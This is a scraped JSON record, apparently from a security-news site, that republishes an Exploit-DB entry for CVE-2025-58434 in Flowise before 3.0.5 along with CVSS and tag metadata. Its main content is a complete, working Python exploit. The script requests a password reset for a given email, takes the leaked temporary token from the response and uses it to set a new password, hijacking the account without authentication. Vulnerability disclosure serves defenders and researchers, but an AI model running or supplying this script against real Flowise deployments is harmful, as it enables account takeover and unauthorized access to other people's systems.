{“lastseen”:”2026-05-13T13:44:39″,”description”:”Exploit Title: Flowise 3.0.5 – Missing Authentication for Critical Function Date: 10\/11\/2025 Exploit Author: nltt0 https:\/\/github.com\/nltt-br Vendor Homepage: https:\/\/flowiseai.com\/ Software Link: https:\/\/github.com\/FlowiseAI\/Flowise Version: 3.0.5…”,”published”:”2026-05-13T00:00:00″,”modified”:”2026-05-13T00:00:00″,”type”:”exploitdb”,”title”:”Flowise \\u0026lt; 3.0.5 – Missing Authentication for Critical Function”,”source”:””,”references”:””,”id”:”EDB-ID:52557″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-58434″],”sourceData”:”# Exploit Title: Flowise \\u003c 3.0.5 – Missing Authentication for Critical Function\\r\\n# Date: 10\/11\/2025\\r\\n# Exploit Author: [nltt0] (https:\/\/github.com\/nltt-br))\\r\\n# Vendor Homepage: https:\/\/flowiseai.com\/\\r\\n# Software Link: https:\/\/github.com\/FlowiseAI\/Flowise\\r\\n# Version: \\u003c 3.0.5\\r\\n# CVE: CVE-2025-58434\\r\\n\\r\\nfrom requests import post \\r\\nfrom argparse import ArgumentParser\\r\\n\\r\\nbanner = r\\”\\”\\”\\r\\n_____ _ _____ \\r\\n\/ __ \\\\ | | \/ ___|\\r\\n| \/ \\\\\/ __ _| | __ _ _ __ __ _ ___ ___ \\\\ `–. \\r\\n| | \/ _` | |\/ _` | ‘_ \\\\ \/ _` |\/ _ \\\\\/ __| `–. \\\\\\r\\n| \\\\__\/\\\\ (_| | | (_| | | | | (_| | (_) \\\\__ \\\\\/\\\\__\/ \/\\r\\n\\\\____\/\\\\__,_|_|\\\\__,_|_| |_|\\\\__, |\\\\___\/|___\/\\\\____\/ \\r\\n __\/ | \\r\\n |___\/ \\r\\n \\r\\n by nltt0\\r\\n\\”\\”\\”\\r\\n\\r\\nprint(banner)\\r\\n\\r\\ntry:\\r\\n parser = ArgumentParser(description=’CVE-2025-58434 [FlowiseAI \\u003c 3.0.5]’, usage=\\”python CVE-2025-58434.py –email xtz@local –newpassword Test@2025 –url http:\/\/localhost:3000\\”)\\r\\n parser.add_argument(‘-e’, ‘–email’, required=True, help=’Registered email’)\\r\\n parser.add_argument(‘-p’, ‘–newpassword’, required=True)\\r\\n parser.add_argument(‘-u’, ‘–url’, required=True)\\r\\n\\r\\n args = parser.parse_args()\\r\\n email = args.email\\r\\n password = args.newpassword\\r\\n url = args.url\\r\\n \\r\\n headers = {\\r\\n ‘Content-Type’: ‘application\/json’\\r\\n }\\r\\n\\r\\n data = {\\r\\n ‘user’: {’email’: email}\\r\\n }\\r\\n\\r\\n url_format1 = ‘{}\/api\/v1\/account\/forgot-password’.format(url)\\r\\n req = post(url_format1, headers=headers, json=data)\\r\\n\\r\\n if req.status_code == 201:\\r\\n req_json = req.json()\\r\\n temp_token = req_json[‘user’][‘tempToken’]\\r\\n\\r\\n data = {\\r\\n ‘user’: {’email’: email,\\r\\n ‘tempToken’: temp_token,\\r\\n \\”password\\”: password\\r\\n }\\r\\n }\\r\\n url_format2 = ‘{}\/api\/v1\/account\/reset-password’.format(url)\\r\\n req = post(url_format2, headers=headers, json=data)\\r\\n print(‘[x] Password changed’)\\r\\n \\r\\n else:\\r\\n print(‘[x] Unregistered user’)\\r\\n\\r\\nexcept Exception as e:\\r\\n print(‘Error in {}’.format(e))”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52557″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52557″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-13T13:44:39″,”description”:”Exploit Title: Flowise 3.0.5 – Missing Authentication for Critical Function Date: 10\/11\/2025 Exploit Author: nltt0 https:\/\/github.com\/nltt-br Vendor Homepage: https:\/\/flowiseai.com\/ Software Link: https:\/\/github.com\/FlowiseAI\/Flowise Version: 3.0.5…”,”published”:”2026-05-13T00:00:00″,”modified”:”2026-05-13T00:00:00″,”type”:”exploitdb”,”title”:”Flowise \\u0026lt;…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,40,13,7,11,5],"class_list":["post-54042","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n